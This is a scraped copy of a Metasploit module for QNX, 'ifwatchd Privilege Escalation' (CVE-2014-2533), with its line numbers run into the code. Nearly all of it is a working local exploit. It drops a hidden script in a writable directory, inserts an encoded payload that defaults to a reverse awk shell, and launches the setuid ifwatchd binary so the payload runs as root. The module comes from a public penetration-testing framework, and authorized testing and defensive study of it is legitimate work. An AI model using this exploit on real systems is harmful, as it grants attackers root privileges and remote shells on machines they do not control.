CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/exploits/qnx/local/ifwatchd_priv_esc.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Local6Rank = ExcellentRanking78include Msf::Post::Linux::Priv9include Msf::Post::File10include Msf::Exploit::FileDropper11prepend Msf::Exploit::Remote::AutoCheck1213def initialize(info = {})14super(15update_info(16info,17'Name' => 'ifwatchd Privilege Escalation',18'Description' => %q{19This module attempts to gain root privileges on QNX 6.4.x and 6.5.x20systems by exploiting the ifwatchd suid executable.2122ifwatchd allows users to specify scripts to execute using the '-A'23command line argument; however, it does not drop privileges when24executing user-supplied scripts, resulting in execution of arbitrary25commands as root.2627This module has been tested successfully on QNX Neutrino 6.5.0 (x86)28and 6.5.0 SP1 (x86).29},30'License' => MSF_LICENSE,31'Author' => [32'cenobyte', # Discovery and exploit33'Tim Brown', # Independent discovery34'bcoles' # Metasploit35],36'References' => [37['CVE', '2014-2533'],38['BID', '66449'],39['EDB', '32153'],40['URL', 'http://seclists.org/bugtraq/2014/Mar/66']41],42'DisclosureDate' => '2014-03-10',43'Platform' => 'unix', # QNX44'Arch' => ARCH_CMD,45'SessionTypes' => %w[shell meterpreter],46'Targets' => [['Automatic', {}]],47'Privileged' => true,48'Payload' => {49'BadChars' => '',50'DisableNops' => true,51'Space' => 1024,52'Compat' => {53'PayloadType' => 'cmd',54'RequiredCmd' => 'gawk generic'55}56},57'DefaultOptions' => {58'WfsDelay' => 10,59'PAYLOAD' => 'cmd/unix/reverse_awk'60},61'Notes' => {62'Stability' => [CRASH_SAFE],63'Reliability' => [REPEATABLE_SESSION],64'SideEffects' => []65}66)67)68register_advanced_options([69OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])70])71end7273def ifwatchd_path74'/sbin/ifwatchd'75end7677def base_dir78datastore['WritableDir']79end8081def check82return CheckCode::Safe("#{ifwatchd_path} is not setuid") unless setuid?(ifwatchd_path)8384CheckCode::Detected("#{ifwatchd_path} is setuid")85end8687def exploit88if !datastore['ForceExploit'] && is_root?89fail_with(Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.')90end9192fail_with(Failure::BadConfig, "#{base_dir} is not writable") unless writable?(base_dir)9394script_path = "#{base_dir}/.#{rand_text_alphanumeric(10..15)}"9596print_status('Writing interface arrival event script...')9798cmd_exec "echo '#!/bin/sh' > #{script_path}"99cmd_exec "echo 'PATH=/bin:/usr/bin' >> #{script_path}"100cmd_exec "echo 'IFWPID=$(ps -edaf | grep \"#{script_path}\" | awk \"!/grep/ { print $2 }\")' >> #{script_path}"101exp = payload.encoded.gsub('"', '\"').gsub('$', '\$')102cmd_exec "echo \"#{exp}\" >> #{script_path}"103cmd_exec "echo 'kill -9 $IFWPID' >> #{script_path}"104register_file_for_cleanup(script_path)105106cmd_exec("chmod +x '#{script_path}'")107108print_status("Executing #{ifwatchd_path}...")109interface = 'lo0'110cmd_exec("#{ifwatchd_path} -A '#{script_path}' -v #{interface} >/dev/null & echo ")111end112end113114115